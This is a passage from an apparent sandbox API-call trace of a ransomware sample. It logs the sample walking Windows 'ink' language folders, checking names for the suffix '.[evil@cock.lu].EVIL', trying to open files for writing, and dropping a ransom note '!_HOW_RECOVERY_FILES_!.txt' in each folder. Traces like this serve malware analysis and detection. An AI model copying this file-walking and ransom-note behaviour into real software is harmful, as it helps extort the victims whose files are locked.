shared\\ink\\en-US\\TabTip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabtip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.453] GetLastError () returned 0x5 [0088.453] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.453] wcsstr (_Str="TipRes.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.453] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 72 [0088.453] wcscmp (_String1="TipRes.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.453] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="TipRes.dll.mui") returned 0x0 [0088.453] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 0x48 [0088.453] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.453] GetLastError () returned 0x5 [0088.453] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.453] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.453] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 73 [0088.453] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.453] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.453] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 0x49 [0088.453] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.454] GetLastError () returned 0x5 [0088.454] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.454] wcsstr (_Str="TipTsf.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.454] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui") returned 72 [0088.454] wcscmp (_String1="TipTsf.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.454] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="TipTsf.dll.mui") returned 0x0 [0088.454] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui") returned 0x48 [0088.454] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.454] GetLastError () returned 0x5 [0088.454] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.454] FindClose (in: hFindFile=0x84b11dd140 | out: hFindFile=0x84b11dd140) returned 1 [0088.454] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 0x39 [0088.455] strlen (_Str="${KEY}") returned 0x6 [0088.455] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.455] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.455] strlen (_Str="${CODE}") returned 0x7 [0088.455] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.455] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.455] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.455] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.456] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.456] __uncaught_exception () returned 0x84b1160800 [0088.456] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.457] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.457] wcsstr (_Str="es-ES", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.457] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES") returned 57 [0088.457] wcscmp (_String1=".", _String2="es-ES") returned -1 [0088.457] wcscmp (_String1="..", _String2="es-ES") returned -1 [0088.457] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES") returned 0x39 [0088.457] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES") returned 0x0 [0088.457] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*" [0088.457] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddc20 [0088.457] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.457] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\.") returned 59 [0088.457] wcscmp (_String1=".", _String2=".") returned 0 [0088.457] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.457] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.457] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\..") returned 60 [0088.457] wcscmp (_String1=".", _String2="..") returned -1 [0088.457] wcscmp (_String1="..", _String2="..") returned 0 [0088.457] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.457] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.457] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 73 [0088.457] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.457] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.457] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui") returned 0x49 [0088.457] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.458] GetLastError () returned 0x5 [0088.458] FindNextFileW (in: hFindFile=0x84b11ddc20, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.458] FindClose (in: hFindFile=0x84b11ddc20 | out: hFindFile=0x84b11ddc20) returned 1 [0088.458] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES") returned 0x39 [0088.458] strlen (_Str="${KEY}") returned 0x6 [0088.458] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.458] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.458] strlen (_Str="${CODE}") returned 0x7 [0088.458] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.458] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.458] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.458] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-ES\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.458] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.458] __uncaught_exception () returned 0x84b1160800 [0088.458] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.459] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.459] wcsstr (_Str="es-MX", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.459] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX") returned 57 [0088.459] wcscmp (_String1=".", _String2="es-MX") returned -1 [0088.459] wcscmp (_String1="..", _String2="es-MX") returned -1 [0088.459] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX") returned 0x39 [0088.459] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX") returned 0x0 [0088.459] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*" [0088.459] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd6e0 [0088.459] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.459] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\.") returned 59 [0088.459] wcscmp (_String1=".", _String2=".") returned 0 [0088.459] FindNextFileW (in: hFindFile=0x84b11dd6e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.459] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.459] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\..") returned 60 [0088.459] wcscmp (_String1=".", _String2="..") returned -1 [0088.459] wcscmp (_String1="..", _String2="..") returned 0 [0088.459] FindNextFileW (in: hFindFile=0x84b11dd6e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.459] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.460] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui") returned 73 [0088.460] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.460] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.460] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui") returned 0x49 [0088.460] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.460] GetLastError () returned 0x5 [0088.460] FindNextFileW (in: hFindFile=0x84b11dd6e0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.460] FindClose (in: hFindFile=0x84b11dd6e0 | out: hFindFile=0x84b11dd6e0) returned 1 [0088.460] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX") returned 0x39 [0088.460] strlen (_Str="${KEY}") returned 0x6 [0088.460] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.460] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.460] strlen (_Str="${CODE}") returned 0x7 [0088.460] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.460] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.460] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.461] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.461] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.461] __uncaught_exception () returned 0x84b1160800 [0088.461] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.461] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.461] wcsstr (_Str="et-EE", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.462] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE") returned 57 [0088.462] wcscmp (_String1=".", _String2="et-EE") returned -1 [0088.462] wcscmp (_String1="..", _String2="et-EE") returned -1 [0088.462] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE") returned 0x39 [0088.462] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE") returned 0x0 [0088.462] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*" [0088.462] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd320 [0088.462] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.462] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\.") returned 59 [0088.462] wcscmp (_String1=".", _String2=".") returned 0 [0088.462] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.462] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.462] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\..") returned 60 [0088.462] wcscmp (_String1=".", _String2="..") returned -1 [0088.462] wcscmp (_String1="..", _String2="..") returned 0 [0088.462] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.462] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.462] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui") returned 73 [0088.462] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.462] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.462] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui") returned 0x49 [0088.462] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.462] GetLastError () returned 0x5 [0088.462] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.462] FindClose (in: hFindFile=0x84b11dd320 | out: hFindFile=0x84b11dd320) returned 1 [0088.462] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE") returned 0x39 [0088.462] strlen (_Str="${KEY}") returned 0x6 [0088.462] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.463] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.463] strlen (_Str="${CODE}") returned 0x7 [0088.463] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.463] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.463] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.463] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.463] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.463] __uncaught_exception () returned 0x84b1160800 [0088.463] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.464] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.464] wcsstr (_Str="fi-FI", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.464] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI") returned 57 [0088.464] wcscmp (_String1=".", _String2="fi-FI") returned -1 [0088.464] wcscmp (_String1="..", _String2="fi-FI") returned -1 [0088.464] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI") returned 0x39 [0088.464] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI") returned 0x0 [0088.464] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*" [0088.464] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd980 [0088.465] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.465] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\.") returned 59 [0088.465] wcscmp (_String1=".", _String2=".") returned 0 [0088.465] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.465] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.465] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\..") returned 60 [0088.465] wcscmp (_String1=".", _String2="..") returned -1 [0088.465] wcscmp (_String1="..", _String2="..") returned 0 [0088.465] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.465] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.465] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui") returned 73 [0088.465] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.465] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.465] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui") returned 0x49 [0088.465] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.465] GetLastError () returned 0x5 [0088.465] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.465] FindClose (in: hFindFile=0x84b11dd980 | out: hFindFile=0x84b11dd980) returned 1 [0088.465] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI") returned 0x39 [0088.465] strlen (_Str="${KEY}") returned 0x6 [0088.465] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.465] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.465] strlen (_Str="${CODE}") returned 0x7 [0088.465] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.465] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.465] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.465] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.466] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.466] __uncaught_exception () returned 0x84b1160800 [0088.466] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.467] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.467] wcsstr (_Str="FlickAnimation.avi", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.467] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 70 [0088.467] wcscmp (_String1="FlickAnimation.avi", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.467] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FlickAnimation.avi") returned 0x0 [0088.467] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi") returned 0x46 [0088.467] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.474] GetLastError () returned 0x5 [0088.474] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.474] wcsstr (_Str="FlickLearningWizard.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.474] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe") returned 75 [0088.474] wcscmp (_String1="FlickLearningWizard.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.474] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FlickLearningWizard.exe") returned 0x0 [0088.474] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe") returned 0x4b [0088.474] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.474] GetLastError () returned 0x5 [0088.474] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.474] wcsstr (_Str="fr-CA", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.474] _snwprintf (in: 